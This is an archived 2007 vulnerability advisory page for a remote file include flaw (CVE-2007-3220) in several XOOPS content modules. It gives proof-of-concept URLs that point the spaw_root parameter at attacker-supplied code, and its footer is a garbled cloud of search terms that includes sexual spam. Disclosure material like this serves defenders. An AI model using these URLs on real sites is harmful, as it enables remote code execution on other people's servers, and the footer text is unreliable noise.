about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability


Title XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability
Published 2007-06-04-12:00AM
Updated 2007-06-20-01:29PM
Class Input Validation Error
CVE   CVE-2007-3220
Remote  Yes
Local  No
Credit  Mahmood_ali, Sp[L]o1T, g00ns and GoLd_M are credited with the discovery of this vulnerability.
Vulnerable  Xoops WiwiMod 0.4
Xoops TinyContent Module 1.5
Xoops iContent Module 1.0
Xoops Cjay Content Module 3
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs and exploit code are available:

http://www.example.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt
http://www.example.com/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=evilcode.txt
http://www.example.com/modules/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=evilcode.txt /data/vulnerabilities/exploits/24302.html
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 22:13:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cutenews WWW.BANGLA 200 /compo 89.com sex sex.video t928t components desi india all cartoo desi sex m www.kar.co TS Flooder CMS is Fre xxl sex tv my album Nuedgirls mambo Remo mambo Remo www.hostfi Video sex t407t wwwxxxsex japanese p mambo Remo good++sixe view_acces Video porn t407t SEXOCEAN Sony erics CMS is Fre Helix Www.xxx.3x t575t Phpprobid Aoioi Free pussy linux 2.6. www89xxxxx nude vedio Titaneik zboard Top PHP mambo Remo news for c www.bebo.c Nude+india www.worldw qshell Cisco IOS